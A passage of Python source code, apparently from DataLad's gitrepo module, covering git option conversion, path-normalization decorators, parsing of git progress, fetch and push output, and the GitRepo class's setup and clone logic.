bool | None, split_single_char_options: bool) -> list[str]:\n if len(name) == 1:\n if value is True:\n return [\"-%s\" % name]\n elif value not in (False, None):\n if split_single_char_options:\n return [\"-%s\" % name, \"%s\" % value]\n else:\n return [\"-%s%s\" % (name, value)]\n else:\n if value is True:\n return [\"--%s\" % dashify(name)]\n elif value is not False and value is not None:\n return [\"--%s=%s\" % (dashify(name), value)]\n return []\n\n args = []\n for k, v in sorted(kwargs.items()):\n if isinstance(v, (list, tuple)):\n for value in v:\n args += transform_kwarg(k, value, split_single_char_options)\n else:\n args += transform_kwarg(k, v, split_single_char_options)\n return args\n\n\ndef _normalize_path(base_dir: str, path: str) -> str:\n \"\"\"Helper to check paths passed to methods of this class.\n\n Checks whether `path` is beneath `base_dir` and normalizes it.\n Additionally paths are converted into relative paths with respect to\n `base_dir`, considering PWD in case of relative paths. This\n is intended to be used in repository classes, which means that\n `base_dir` usually will be the repository's base directory.\n\n Parameters\n ----------\n base_dir: str\n directory to serve as base to normalized, relative paths\n path: str\n path to be normalized\n\n Returns\n -------\n str:\n path, that is a relative path with respect to `base_dir`\n \"\"\"\n if not path:\n return path\n pathobj = Path(path)\n\n # do absolute() in addition to always get an absolute path\n # even with non-existing base_dirs on windows\n base_dir = str(Path(base_dir).resolve().absolute()) # realpath OK\n\n # path = normpath(path)\n # Note: disabled normpath, because it may break paths containing symlinks;\n # But we don't want to realpath relative paths, in case cwd isn't the\n # correct base.\n\n if pathobj.is_absolute():\n # path might already be a symlink pointing to annex etc,\n # so realpath only its directory, to get \"inline\" with\n # realpath(base_dir) above\n path = str(pathobj.parent.resolve() / pathobj.name) # realpath OK\n # Executive decision was made to not do this kind of magic!\n #\n # elif commonprefix([realpath(getpwd()), base_dir]) == base_dir:\n # # If we are inside repository, rebuilt relative paths.\n # path = opj(realpath(getpwd()), path)\n #\n # BUT with relative curdir/pardir start it would assume relative to curdir\n #\n elif path.startswith(_curdirsep) or path.startswith(_pardirsep):\n path = str(Path(getpwd()).resolve() / pathobj) # realpath OK\n else:\n # We were called from outside the repo. Therefore relative paths\n # are interpreted as being relative to self.path already.\n return path\n\n if commonprefix([path, base_dir]) != base_dir:\n raise FileNotInRepositoryError(msg=\"Path outside repository: %s\"\n % base_dir, filename=path)\n\n return relpath(path, start=base_dir)\n\n\nclass _WithPath(Protocol):\n path: str\n\n\n@optional_args\ndef normalize_path(func: Callable[Concatenate[_WithPath, str, P], T]) -> Callable[Concatenate[_WithPath, str, P], T]:\n \"\"\"Decorator to provide unified path conversion for a single file\n\n Unlike normalize_paths, intended to be used for functions dealing with a\n single filename at a time\n\n Note\n ----\n This is intended to be used within the repository classes and therefore\n returns a class method!\n\n The decorated function is expected to take a path at\n first positional argument (after 'self'). 
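A few usage examples make the keyword-to-option transformation above easier to follow. The expected results are read off the `transform_kwarg` logic shown here (note that kwargs are emitted in sorted order), so treat them as a sketch to verify against an installed datalad rather than authoritative documentation.

```python
from datalad.support.gitrepo import to_options

# Keyword arguments become git command-line options, sorted by name:
to_options(C='/my/path', no_commit=True)
# -> ['-C', '/my/path', '--no-commit']

# Values of long options are attached with '=':
to_options(message='initial commit')
# -> ['--message=initial commit']

# With split_single_char_options=False, short options keep their value attached:
to_options(False, n='5')
# -> ['-n5']

# Lists/tuples repeat the option once per value:
to_options(exclude=['a', 'b'])
# -> ['--exclude=a', '--exclude=b']
```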
Additionally the class `func`\n is a member of, is expected to have an attribute 'path'.\n \"\"\"\n\n @wraps(func)\n def _wrap_normalize_path(self: _WithPath, file_: str, *args: P.args, **kwargs: P.kwargs) -> T:\n file_new = _normalize_path(self.path, file_)\n return func(self, file_new, *args, **kwargs)\n\n return _wrap_normalize_path\n\n\n@optional_args\ndef normalize_paths(func, match_return_type=True, map_filenames_back=False,\n serialize=False):\n \"\"\"Decorator to provide unified path conversions.\n\n Note\n ----\n This is intended to be used within the repository classes and therefore\n returns a class method!\n\n The decorated function is expected to take a path or a list of paths at\n first positional argument (after 'self'). Additionally the class `func`\n is a member of, is expected to have an attribute 'path'.\n\n Accepts either a list of paths or a single path in a str. Passes a list\n to decorated function either way, but would return based on the value of\n match_return_type and possibly input argument.\n\n If a call to the wrapped function includes normalize_path and it is False\n no normalization happens for that function call (used for calls to wrapped\n functions within wrapped functions, while possible CWD is within a\n repository)\n\n Parameters\n ----------\n match_return_type : bool, optional\n If True, and a single string was passed in, it would return the first\n element of the output (after verifying that it is a list of length 1).\n It makes easier to work with single files input.\n map_filenames_back : bool, optional\n If True and returned value is a dictionary, it assumes to carry entries\n one per file, and then filenames are mapped back to as provided from the\n normalized (from the root of the repo) paths\n serialize : bool, optional\n Loop through files giving only a single one to the function one at a time.\n This allows to simplify implementation and interface to annex commands\n which do not take multiple args in the same call (e.g. 
checkpresentkey)\n \"\"\"\n\n @wraps(func)\n def _wrap_normalize_paths(self, files, *args, **kwargs):\n\n normalize = _normalize_path if kwargs.pop('normalize_paths', True) \\\n else lambda rpath, filepath: filepath\n\n if files:\n if isinstance(files, str) or not files:\n files_new = [normalize(self.path, files)]\n single_file = True\n elif isinstance(files, list):\n files_new = [normalize(self.path, path) for path in files]\n single_file = False\n else:\n raise ValueError(\"_files_decorator: Don't know how to handle \"\n \"instance of %s.\" % type(files))\n else:\n single_file = None\n files_new = []\n\n if map_filenames_back:\n def remap_filenames(out):\n \"\"\"Helper to map files back to non-normalized paths\"\"\"\n if isinstance(out, dict):\n assert(len(out) == len(files_new))\n files_ = [files] if single_file else files\n mapped = out.__class__()\n for fin, fout in zip(files_, files_new):\n mapped[fin] = out[fout]\n return mapped\n else:\n return out\n else:\n remap_filenames = lambda x: x\n\n if serialize: # and not single_file:\n result = [\n func(self, f, *args, **kwargs)\n for f in files_new\n ]\n else:\n result = func(self, files_new, *args, **kwargs)\n\n if single_file is None:\n # no files were provided, nothing we can do really\n return result\n elif (result is None) or not match_return_type or not single_file:\n # If function doesn't return anything or no denormalization\n # was requested or it was not a single file\n return remap_filenames(result)\n elif single_file:\n if len(result) != 1:\n # Magic doesn't apply\n return remap_filenames(result)\n elif isinstance(result, (list, tuple)):\n return result[0]\n elif isinstance(result, dict) and tuple(result)[0] == files_new[0]:\n # assume that returned dictionary has files as keys.\n return tuple(result.values())[0]\n else:\n # no magic can apply\n return remap_filenames(result)\n else:\n return RuntimeError(\"should have not got here... check logic\")\n\n return _wrap_normalize_paths\n\n\nif \"2.24.0\" <= external_versions[\"cmd:git\"] < \"2.25.0\":\n # An unintentional change in Git 2.24.0 led to `ls-files -o` traversing\n # into untracked submodules when multiple pathspecs are given, returning\n # repositories that are deeper than the first level. 
This helper filters\n # these deeper levels out so that save_() doesn't fail trying to add them.\n #\n # This regression fixed with upstream's 072a231016 (2019-12-10).\n def _prune_deeper_repos(repos: list[Path]) -> list[Path]:\n firstlevel_repos = []\n prev = None\n for repo in sorted(repos):\n if not (prev and str(repo).startswith(prev)):\n prev = str(repo)\n firstlevel_repos.append(repo)\n return firstlevel_repos\nelse:\n def _prune_deeper_repos(repos: list[Path]) -> list[Path]:\n return repos\n\n\nclass GitProgress(WitlessProtocol):\n \"\"\"Reduced variant of GitPython's RemoteProgress class\n\n Original copyright:\n Copyright (C) 2008, 2009 Michael Trier and contributors\n Original license:\n BSD 3-Clause \"New\" or \"Revised\" License\n \"\"\"\n # inform super-class to capture stderr\n proc_err = True\n\n _num_op_codes = 10\n BEGIN, END, COUNTING, COMPRESSING, WRITING, RECEIVING, RESOLVING, FINDING_SOURCES, CHECKING_OUT, ENUMERATING = \\\n [1 << x for x in range(_num_op_codes)]\n STAGE_MASK = BEGIN | END\n OP_MASK = ~STAGE_MASK\n\n DONE_TOKEN = 'done.'\n TOKEN_SEPARATOR = ', '\n\n _known_ops = {\n COUNTING: (\"Counting\", \"Objects\"),\n ENUMERATING: (\"Enumerating\", \"Objects\"),\n COMPRESSING: (\"Compressing\", \"Objects\"),\n WRITING: (\"Writing\", \"Objects\"),\n RECEIVING: (\"Receiving\", \"Objects\"),\n RESOLVING: (\"Resolving\", \"Deltas\"),\n FINDING_SOURCES: (\"Finding\", \"Sources\"),\n CHECKING_OUT: (\"Check out\", \"Things\"),\n }\n\n __slots__ = ('_unprocessed', '_seen_ops', '_pbars')\n\n re_op_absolute = re.compile(r\"(remote: )?([\\w\\s]+):\\s+()(\\d+)()(.*)\")\n re_op_relative = re.compile(r\"(remote: )?([\\w\\s]+):\\s+(\\d+)% \\((\\d+)/(\\d+)\\)(.*)\")\n\n def __init__(self, done_future: Any = None, encoding: Optional[str] = None) -> None:\n super().__init__(done_future=done_future, encoding=encoding)\n self._unprocessed: Optional[bytes] = None\n self._seen_ops: list[int] = []\n self._pbars: set[str] = set()\n\n def connection_made(self, transport: subprocess.Popen) -> None:\n super().connection_made(transport)\n self._seen_ops = []\n self._pbars = set()\n\n def process_exited(self) -> None:\n # take down any progress bars that were not closed orderly\n for pbar_id in self._pbars:\n log_progress(\n lgr.info,\n pbar_id,\n 'Finished',\n )\n super().process_exited()\n\n def pipe_data_received(self, fd: int, byts: bytes) -> None:\n # progress reports only come from stderr\n if fd != 2:\n # let the base class decide what to do with it\n super().pipe_data_received(fd, byts)\n return\n for line in byts.splitlines(keepends=True):\n # put any unprocessed content back in front\n line = self._unprocessed + line if self._unprocessed else line\n self._unprocessed = None\n if not self._parse_progress_line(line):\n # anything that doesn't look like a progress report\n # is retained and returned\n # in case of partial progress lines, this can lead to\n # leakage of progress info into the output, but\n # it is better to enable better (maybe more expensive)\n # subsequent filtering than hiding lines with\n # unknown, potentially important info\n lgr.debug('Non-progress stderr: %s', line)\n if line.endswith((b'\\r', b'\\n')):\n # complete non-progress line, pass on\n super().pipe_data_received(fd, line)\n else:\n # an incomplete line, maybe the next batch completes\n # it to become a recognizable progress report\n self._unprocessed = line\n\n def _parse_progress_line(self, bytes_line: bytes) -> bool:\n \"\"\"Process a single line\n\n Parameters\n ----------\n bytes_line : bytes\n\n 
Returns\n -------\n bool\n Flag whether the line was recognized as a Git progress report.\n \"\"\"\n # handle\n # Counting objects: 4, done.\n # Compressing objects: 50% (1/2)\n # Compressing objects: 100% (2/2)\n # Compressing objects: 100% (2/2), done.\n line = bytes_line.decode(self.encoding)\n if line.startswith(('warning:', 'error:', 'fatal:')):\n return False\n\n # find escape characters and cut them away - regex will not work with\n # them as they are non-ascii. As git might expect a tty, it will send them\n last_valid_index = None\n for i, c in enumerate(reversed(line)):\n if ord(c) < 32:\n # its a slice index\n last_valid_index = -i - 1\n # END character was non-ascii\n # END for each character in line\n if last_valid_index is not None:\n line = line[:last_valid_index]\n # END cut away invalid part\n line = line.rstrip()\n\n cur_count, max_count = None, None\n match = self.re_op_relative.match(line)\n if match is None:\n match = self.re_op_absolute.match(line)\n\n if not match:\n return False\n # END could not get match\n\n op_code = 0\n _remote, op_name, _percent, cur_count, max_count, message = match.groups()\n\n # get operation id\n if op_name == \"Counting objects\":\n op_code |= self.COUNTING\n elif op_name == \"Compressing objects\":\n op_code |= self.COMPRESSING\n elif op_name == \"Writing objects\":\n op_code |= self.WRITING\n elif op_name == 'Receiving objects':\n op_code |= self.RECEIVING\n elif op_name == 'Resolving deltas':\n op_code |= self.RESOLVING\n elif op_name == 'Finding sources':\n op_code |= self.FINDING_SOURCES\n elif op_name == 'Checking out files':\n op_code |= self.CHECKING_OUT\n elif op_name == 'Enumerating objects':\n op_code |= self.ENUMERATING\n else:\n # Note: On windows it can happen that partial lines are sent\n # Hence we get something like \"CompreReceiving objects\", which is\n # a blend of \"Compressing objects\" and \"Receiving objects\".\n # This can't really be prevented.\n lgr.debug(\n 'Output line matched a progress report of an unknown type: %s',\n line)\n # TODO investigate if there is any chance that we might swallow\n # important info -- until them do not flag this line\n # as progress\n return False\n # END handle op code\n\n pbar_id = 'gitprogress-{}-{}'.format(id(self), op_code)\n\n op_props = self._known_ops[op_code]\n\n # figure out stage\n if op_code not in self._seen_ops:\n self._seen_ops.append(op_code)\n op_code |= self.BEGIN\n log_progress(\n lgr.info,\n pbar_id,\n 'Start {} {}'.format(\n op_props[0].lower(),\n op_props[1].lower(),\n ),\n label=op_props[0],\n unit=' {}'.format(op_props[1]),\n total=float(max_count) if max_count else None,\n )\n self._pbars.add(pbar_id)\n # END begin opcode\n\n if message is None:\n message = ''\n # END message handling\n\n done_progress = False\n message = message.strip()\n if message.endswith(self.DONE_TOKEN):\n op_code |= self.END\n message = message[:-len(self.DONE_TOKEN)]\n done_progress = True\n # END end message handling\n message = message.strip(self.TOKEN_SEPARATOR)\n\n if cur_count and max_count:\n log_progress(\n lgr.info,\n pbar_id,\n line,\n update=float(cur_count),\n noninteractive_level=logging.DEBUG,\n )\n\n if done_progress:\n log_progress(\n lgr.info,\n pbar_id,\n 'Finished {} {}'.format(\n op_props[0].lower(),\n op_props[1].lower(),\n ),\n noninteractive_level=logging.DEBUG,\n )\n self._pbars.discard(pbar_id)\n return True\n\n\nclass StdOutCaptureWithGitProgress(GitProgress):\n proc_out = True\n\n\nclass FetchInfo(dict):\n \"\"\"\n dict that carries results of a fetch 
operation of a single head\n\n Reduced variant of GitPython's RemoteProgress class\n\n Original copyright:\n Copyright (C) 2008, 2009 Michael Trier and contributors\n Original license:\n BSD 3-Clause \"New\" or \"Revised\" License\n \"\"\"\n\n NEW_TAG, NEW_HEAD, HEAD_UPTODATE, TAG_UPDATE, REJECTED, FORCED_UPDATE, \\\n FAST_FORWARD, ERROR = [1 << x for x in range(8)]\n\n _re_fetch_result = re.compile(r'^\\s*(.) (\\[?[\\w\\s\\.$@]+\\]?)\\s+(.+) [-> ]+ ([^\\s]+)( \\(.*\\)?$)?')\n\n _flag_map = {\n '!': ERROR,\n '+': FORCED_UPDATE,\n '*': 0,\n '=': HEAD_UPTODATE,\n ' ': FAST_FORWARD,\n '-': TAG_UPDATE,\n }\n _operation_map = {\n NEW_TAG: 'new-tag',\n NEW_HEAD: 'new-branch',\n HEAD_UPTODATE: 'uptodate',\n TAG_UPDATE: 'tag-update',\n REJECTED: 'rejected',\n FORCED_UPDATE: 'forced-update',\n FAST_FORWARD: 'fast-forward',\n ERROR: 'error',\n }\n\n @classmethod\n def _from_line(cls, line: str) -> FetchInfo:\n \"\"\"Parse information from the given line as returned by git-fetch -v\n and return a new FetchInfo object representing this information.\n \"\"\"\n match = cls._re_fetch_result.match(line)\n if match is None:\n raise ValueError(\"Failed to parse line: %r\" % line)\n\n # parse lines\n control_character, operation, local_remote_ref, remote_local_ref, note = \\\n match.groups()\n\n # parse flags from control_character\n flags = 0\n try:\n flags |= cls._flag_map[control_character]\n except KeyError:\n raise ValueError(\n \"Control character %r unknown as parsed from line %r\"\n % (control_character, line))\n # END control char exception handling\n\n # parse operation string for more info - makes no sense for symbolic refs,\n # but we parse it anyway\n old_commit = None\n if 'rejected' in operation:\n flags |= cls.REJECTED\n if 'new tag' in operation:\n flags |= cls.NEW_TAG\n if 'tag update' in operation:\n flags |= cls.TAG_UPDATE\n if 'new branch' in operation:\n flags |= cls.NEW_HEAD\n if '...' in operation or '..' 
in operation:\n split_token = '...'\n if control_character == ' ':\n split_token = split_token[:-1]\n old_commit = operation.split(split_token)[0]\n # END handle refspec\n\n return cls(\n ref=remote_local_ref.strip(),\n local_ref=local_remote_ref.strip(),\n # convert flag int into a list of operation labels\n operations=[\n cls._operation_map[o]\n for o in cls._operation_map.keys()\n if flags & o\n ],\n note=note,\n old_commit=old_commit,\n )\n\n\nclass PushInfo(dict):\n \"\"\"dict that carries results of a push operation of a single head\n\n Reduced variant of GitPython's RemoteProgress class\n\n Original copyright:\n Copyright (C) 2008, 2009 Michael Trier and contributors\n Original license:\n BSD 3-Clause \"New\" or \"Revised\" License\n \"\"\"\n NEW_TAG, NEW_HEAD, NO_MATCH, REJECTED, REMOTE_REJECTED, REMOTE_FAILURE, DELETED, \\\n FORCED_UPDATE, FAST_FORWARD, UP_TO_DATE, ERROR = [1 << x for x in range(11)]\n\n _flag_map = {'X': NO_MATCH,\n '-': DELETED,\n '*': 0,\n '+': FORCED_UPDATE,\n ' ': FAST_FORWARD,\n '=': UP_TO_DATE,\n '!': ERROR}\n\n _operation_map = {\n NEW_TAG: 'new-tag',\n NEW_HEAD: 'new-branch',\n NO_MATCH: 'no-match',\n REJECTED: 'rejected',\n REMOTE_REJECTED: 'remote-rejected',\n REMOTE_FAILURE: 'remote-failure',\n DELETED: 'deleted',\n FORCED_UPDATE: 'forced-update',\n FAST_FORWARD: 'fast-forward',\n UP_TO_DATE: 'uptodate',\n ERROR: 'error',\n }\n\n @classmethod\n def _from_line(cls, line: str) -> PushInfo:\n \"\"\"Create a new PushInfo instance as parsed from line which is expected to be like\n refs/heads/master:refs/heads/master 05d2687..1d0568e as bytes\"\"\"\n control_character, from_to, summary = line.split('\\t', 3)\n flags = 0\n\n # control character handling\n try:\n flags |= cls._flag_map[control_character]\n except KeyError:\n raise ValueError(\"Control character %r unknown as parsed from line %r\" % (control_character, line))\n # END handle control character\n\n # from_to handling\n from_ref_string, to_ref_string = from_to.split(':')\n\n # commit handling, could be message or commit info\n old_commit = None\n if summary.startswith('['):\n if \"[rejected]\" in summary:\n flags |= cls.REJECTED\n elif \"[remote rejected]\" in summary:\n flags |= cls.REMOTE_REJECTED\n elif \"[remote failure]\" in summary:\n flags |= cls.REMOTE_FAILURE\n elif \"[no match]\" in summary:\n flags |= cls.ERROR\n elif \"[new tag]\" in summary:\n flags |= cls.NEW_TAG\n elif \"[new branch]\" in summary:\n flags |= cls.NEW_HEAD\n # up-to-date encoded in control character\n else:\n # fast-forward or forced update - was encoded in control character,\n # but we parse the old and new commit\n split_token = \"...\"\n if control_character == \" \":\n split_token = \"..\"\n old_sha, _new_sha = summary.split(' ')[0].split(split_token)\n # have to use constructor here as the sha usually is abbreviated\n old_commit = old_sha\n # END message handling\n\n return cls(\n from_ref=from_ref_string.strip(),\n to_ref=to_ref_string.strip(),\n # convert flag int into a list of operation labels\n operations=[\n cls._operation_map[o]\n for o in cls._operation_map.keys()\n if flags & o\n ],\n note=summary.strip(),\n old_commit=old_commit,\n )\n\n\nInfoT = TypeVar(\"InfoT\", FetchInfo, PushInfo)\n\n\nclass GitAddOutput(TypedDict):\n file: str\n success: bool\n\n\n@path_based_str_repr\nclass GitRepo(CoreGitRepo):\n \"\"\"Representation of a git repository\n\n \"\"\"\n # We must check git config to have name and email set, but\n # should do it once\n _config_checked = False\n\n GIT_MIN_VERSION = \"2.19.1\"\n 
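For orientation, here is roughly what the `FetchInfo` and `PushInfo` line parsers above produce. The sample inputs are modeled on the line formats named in their docstrings (a `git fetch -v` status line and a tab-separated push status line), and the resulting fields are inferred from the parsing code itself; both `_from_line` helpers are internal, so this is illustration only.

```python
from datalad.support.gitrepo import FetchInfo, PushInfo

# A `git fetch -v` status line for an already up-to-date branch:
info = FetchInfo._from_line(' = [up to date]      master     -> origin/master')
# info['ref'] == 'origin/master', info['local_ref'] == 'master',
# info['operations'] == ['uptodate']

# A tab-separated push status line of the shape named in PushInfo._from_line:
info = PushInfo._from_line(' \trefs/heads/master:refs/heads/master\t05d2687..1d0568e')
# info['from_ref'] == 'refs/heads/master', info['to_ref'] == 'refs/heads/master',
# info['operations'] == ['fast-forward'], info['old_commit'] == '05d2687'
```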
git_version = None\n\n @classmethod\n def _check_git_version(cls) -> None:\n external_versions.check(\"cmd:git\", min_version=cls.GIT_MIN_VERSION)\n cls.git_version = external_versions['cmd:git']\n\n # This is the least common denominator to claim that a user\n # used DataLad.\n # Citing JOSS publication https://joss.theoj.org/papers/10.21105/joss.03262\n @due.dcite(Doi(\"10.21105/joss.03262\"),\n # override path since there is no need ATM for such details\n path=\"datalad\",\n description=\"DataLad - Data management and distribution platform\")\n def __init__(self, path: str, runner: Any = None, create: bool = True,\n git_opts: Optional[dict[str, Any]] = None, repo: Any = None,\n fake_dates: bool = False, create_sanity_checks: bool = True,\n **kwargs: Any) -> None:\n \"\"\"Creates representation of git repository at `path`.\n\n Can also be used to create a git repository at `path`.\n\n Parameters\n ----------\n path: str\n path to the git repository; In case it's not an absolute path,\n it's relative to PWD\n create: bool, optional\n if true, creates a git repository at `path` if there is none. Also\n creates `path`, if it doesn't exist.\n If set to false, an exception is raised in case `path` doesn't exist\n or doesn't contain a git repository.\n repo: git.Repo, optional\n This argument is ignored.\n create_sanity_checks: bool, optional\n Whether to perform sanity checks during initialization (when\n `create=True` and target path is not a valid repo already), such as\n that new repository is not created in the directory where git already\n tracks some files.\n kwargs:\n keyword arguments serving as additional options to the git-init\n command. Therefore, it makes sense only if called with `create`.\n\n Generally, this way of passing options to the git executable is\n (or will be) used a lot in this class. It's a transformation of\n python-style keyword arguments (or a `dict`) to command line arguments,\n provided by GitPython.\n\n A single character keyword will be prefixed by '-', multiple characters\n by '--'. An underscore in the keyword becomes a dash. The value of the\n keyword argument is used as the value for the corresponding command\n line argument. Assigning a boolean creates a flag.\n\n Examples:\n no_commit=True => --no-commit\n C='/my/path' => -C /my/path\n\n \"\"\"\n # this will set up .pathobj and .dot_git\n super().__init__(path)\n\n if self.git_version is None:\n self._check_git_version()\n\n # BEGIN Repo validity test\n # We want to fail early for tests, that would be performed a lot. In\n # particular this is about GitRepo.is_valid_repo. We would use the\n # latter to decide whether or not to call GitRepo() only for __init__ to\n # then test the same things again. If we fail early we can save the\n # additional test from outer scope.\n self.path = path\n\n # Note, that the following three path objects are used often and\n # therefore are stored for performance. Path object creation comes with\n # a cost. Most notably, this is used for validity checking of the\n # repository.\n _valid_repo = self.is_valid_git()\n\n do_create = False\n if create and not _valid_repo:\n if repo is not None:\n # `repo` passed with `create`, which doesn't make sense\n raise TypeError(\"argument 'repo' must not be used with 'create'\")\n do_create = True\n else:\n # Note: We used to call gitpy.Repo(path) here, which potentially\n # raised NoSuchPathError or InvalidGitRepositoryError. This is\n # used by callers of GitRepo.__init__() to detect whether we have a\n # valid repo at `path`. 
Now, with switching to lazy loading property\n # `repo`, we detect those cases without instantiating a\n # gitpy.Repo().\n\n if not exists(path):\n raise NoSuchPathError(path)\n if not _valid_repo:\n raise InvalidGitRepositoryError(path)\n # END Repo validity test\n\n # So that we \"share\" control paths with git/git-annex\n if ssh_manager:\n ssh_manager.ensure_initialized()\n\n # note: we may also want to distinguish between a path to the worktree\n # and the actual repository\n\n if git_opts is None:\n git_opts = {}\n if kwargs:\n git_opts.update(kwargs)\n\n self._cfg = None\n\n if do_create: # we figured it out earlier\n from_cmdline = git_opts.pop('_from_cmdline_', [])\n self.init(\n sanity_checks=create_sanity_checks,\n init_options=from_cmdline + to_options(True, **git_opts),\n )\n\n # with DryRunProtocol path might still not exist\n self.inode: Optional[int]\n if exists(self.path):\n self.inode = os.stat(self.path).st_ino\n else:\n self.inode = None\n\n if fake_dates:\n self.configure_fake_dates()\n\n @property\n def bare(self) -> bool:\n \"\"\"Returns a bool indicating whether the repository is bare\n\n Importantly, this is not reporting the configuration value\n of 'core.bare', in order to be usable at a stage where a\n Repo instance is not yet equipped with a ConfigManager.\n Instead, it is testing whether the repository path and its\n \"dot_git\" are identical. The value of 'core.bare' can be query\n from the ConfigManager in a fully initialized instance.\n \"\"\"\n return self.pathobj == self.dot_git\n\n @classmethod\n def clone(cls, url: str, path: str, *args: Any, clone_options: Optional[list[str] | dict[str, Option]] = None, **kwargs: Any) -> Self:\n \"\"\"Clone url into path\n\n Provides workarounds for known issues (e.g.\n https://github.com/datalad/datalad/issues/785)\n\n Parameters\n ----------\n url : str\n path : str\n clone_options : dict or list\n Arbitrary options that will be passed on to the underlying call to\n `git-clone`. This may be a list of plain options or key-value pairs\n that will be converted to a list of plain options with `to_options`.\n expect_fail : bool\n Whether expect that command might fail, so error should be logged then\n at DEBUG level instead of ERROR\n kwargs:\n Passed to the Repo class constructor.\n \"\"\"\n\n if 'repo' in kwargs:\n raise TypeError(\"argument 'repo' conflicts with cloning\")\n # TODO: what about 'create'?\n\n expect_fail = kwargs.pop('expect_fail', False)\n # fail early on non-empty target:\n from os import listdir\n if exists(path) and listdir(path):\n raise ValueError(\n \"destination path '%s' already exists and is not an \"\n \"empty directory.\" % path)\n else:\n # protect against cloning into existing and obviously dangling\n # instance for that location\n try:\n del cls._unique_instances[path]\n except KeyError:\n # didn't exist - all fine\n pass\n\n # Massage URL\n url_ri = RI(url) if not isinstance(url, RI) else url\n if on_windows:\n # When we're cloning from a local path on Windows, the URL at\n # this point is platform-specific (e.g., \"..\\\\origin\"). 
According \n # to Git clone's manpage, clone urls can't have backslashes.\n # While Git does manage to clone a URL with backslashes, \n # in the case of subdatasets cloned from relative paths it nevertheless\n # messed up the resulting remote url, resulting in a mix of\n # front and backslashes (see also gh-7180): \n # 'C:/Users/adina/AppData/Local/Temp/datalad_temp_frvczceh/ds/..\\\\origin' \n # Therefore, we're turning it to Posix now.\n if isinstance(url_ri, PathRI):\n url = Path(url).as_posix()\n url_ri = PathRI(url)\n\n else:\n # if we are on windows, the local path of a URL\n # would not end up being a proper local path and cloning\n # would fail. Don't try to be smart and just pass the\n # URL along unmodified\n\n # try to get a local path from `url`:\n try:\n url = url_ri.localpath\n url_ri = RI(url)\n except ValueError:\n pass\n\n if is_ssh(url_ri):\n ssh_manager.get_connection(url).open()\n else:\n if isinstance(url_ri, PathRI):\n # expand user, because execution not going through a shell\n # doesn't work well otherwise\n new_url = os.path.expanduser(url)\n if url != new_url:\n lgr.info(\"Expanded source path to %s from %s\", new_url, url)\n url = new_url\n\n cmd = cls._git_cmd_prefix + ['clone', '--progress']\n if clone_options:\n if isinstance(clone_options, Mapping):\n clone_options = to_options(True, **clone_options)\n cmd.extend(clone_options)\n cmd.extend([url, path])\n\n fix_annex = None\n ntries = 5 # 3 is not enough for robust workaround\n for trial in range(ntries):\n try:\n lgr.debug(\"Git clone from %s to %s\", url, path)\n\n res = GitWitlessRunner().run(cmd, protocol=GitProgress)\n # fish out non-critical warnings by git-clone\n # (empty repo clone, etc.), all other content is logged\n # by the progress helper to 'debug'\n for errline in res['stderr'].splitlines():\n if errline.startswith('warning:'):\n lgr.warning(errline[8:].strip())\n lgr.debug(\"Git clone completed\")\n break\n except CommandError as e:\n # log here but let caller decide what to do\n ce = CapturedException(e)\n str_e = str(e)\n # see https://github.com/datalad/datalad/issues/785\n if re.search(\"Request for .*aborted.*Unable to find\", str_e,\n re.DOTALL) \\\n and trial < ntries - 1:\n lgr.info(\n \"Hit a known issue with Git (see GH#785). Trial #%d, \"\n \"retrying\",\n trial)\n continue\n #(lgr.debug if expect_fail else lgr.error)(e_str)\n\n if \"Clone succeeded, but checkout failed.\" in str_e:\n fix_annex = ce\n break\n\n raise\n\n # get ourselves a repository instance\n gr = cls(path, *args, **kwargs)\n if fix_annex:\n # cheap check whether we deal with an AnnexRepo - we can't check the class of `gr` itself, since we then\n # would need to import our own subclass\n if hasattr(gr, 'is_valid_annex'):\n lgr.warning(\"Experienced issues while cloning. \"\n \"Trying to fix it, using git-annex-fsck.\")\n if not gr.is_initialized():\n gr._init()\n gr.fsck()\n else:\n lgr.warning(\"Experienced issues while cloning: %s\", fix_annex)\n # ensure that Git doesn't mangle relative paths into obscure absolute\n # paths: https://github.com/datalad/datalad/issues/3538\n if isinstance(url_ri, PathRI):\n url_path = Path(url)\n if not url_path.is_absolute():\n # get git-created path\n remote_url = 'remote.' 
+ gr.get_remotes()[0] + '.url'\n git_url = gr.config.get(remote_url)\n if Path(git_url).is_absolute():\n # Git created an absolute path from a relative URL.\n git_url = op.relpath(git_url, gr.path)\n # always in POSIX even on Windows\n path = Path(git_url).as_posix()\n gr.config.set(remote_url, path,\n scope='local', force=True)\n return gr\n\n # Note: __del__ shouldn't be needed anymore as we switched to\n # `weakref.finalize`.\n # https://docs.python.org/3/library/weakref.html#comparing-finalizers-with-del-methods\n #\n # Keeping both methods and this comment around as a reminder to not\n # use __del__, if we figure there's a need for cleanup in the future.\n #\n # def __del__(self):\n # # unbind possibly bound ConfigManager, to prevent all kinds of weird\n # # stalls etc\n # self._cfg = None\n\n def is_valid_git(self) -> bool:\n \"\"\"Returns whether the underlying repository appears to be still valid\n\n Note, that this almost identical to the classmethod is_valid_repo().\n However, if we are testing an existing instance, we can save Path object\n creations. Since this testing is done a lot, this is relevant. Creation\n of the Path objects in is_valid_repo() takes nearly half the time of the\n entire function.\n\n Also note, that this method is bound to an instance but still\n class-dependent, meaning that a subclass cannot simply overwrite it.\n This is particularly important for the call from within __init__(),\n which in turn is called by the subclasses' __init__. Using an overwrite\n would lead to the wrong thing being called.\n \"\"\"\n return self.is_valid()\n\n @classmethod\n def is_valid_repo(cls, path: str) -> bool:\n \"\"\"Returns if a given path points to a git repository\"\"\"\n return cls.is_valid(path)\n\n @staticmethod\n def get_git_dir(repo: str | GitRepo) -> str:\n \"\"\"figure out a repo's gitdir\n\n '.git' might be a directory, a symlink or a file\n\n Note\n ----\n This method is likely to get deprecated, please use GitRepo.dot_git instead!\n That one's not static, but it's cheaper and you should avoid\n not having an instance of a repo you're working on anyway.\n Note, that the property in opposition to this method returns an absolute path.\n\n\n Parameters\n ----------\n repo: path or Repo instance\n currently expected to be the repos base dir\n\n Returns\n -------\n str\n relative path to the repo's git dir; So, default would be \".git\"\n \"\"\"\n if isinstance(repo, GitRepo):\n return str(repo.dot_git)\n pathobj = Path(repo)\n dot_git = _get_dot_git(pathobj, ok_missing=False)\n try:\n dot_git = dot_git.relative_to(pathobj)\n except ValueError:\n # is not a subpath, return as is\n lgr.debug(\"Path %r is not subpath of %r\", dot_git, pathobj)\n return str(dot_git)\n\n @property\n def config(self):\n # just proxy the core repo APIs property for backward-compatibility\n return self.cfg\n\n def is_with_annex(self) -> bool:\n \"\"\"Report if GitRepo (assumed) has (remotes with) a git-annex branch\n \"\"\"\n return any(\n b['refname:strip=2'] == 'git-annex' or 